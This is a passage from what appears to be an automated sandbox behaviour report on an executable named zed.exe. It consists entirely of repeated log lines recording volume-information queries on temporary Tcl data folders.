Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
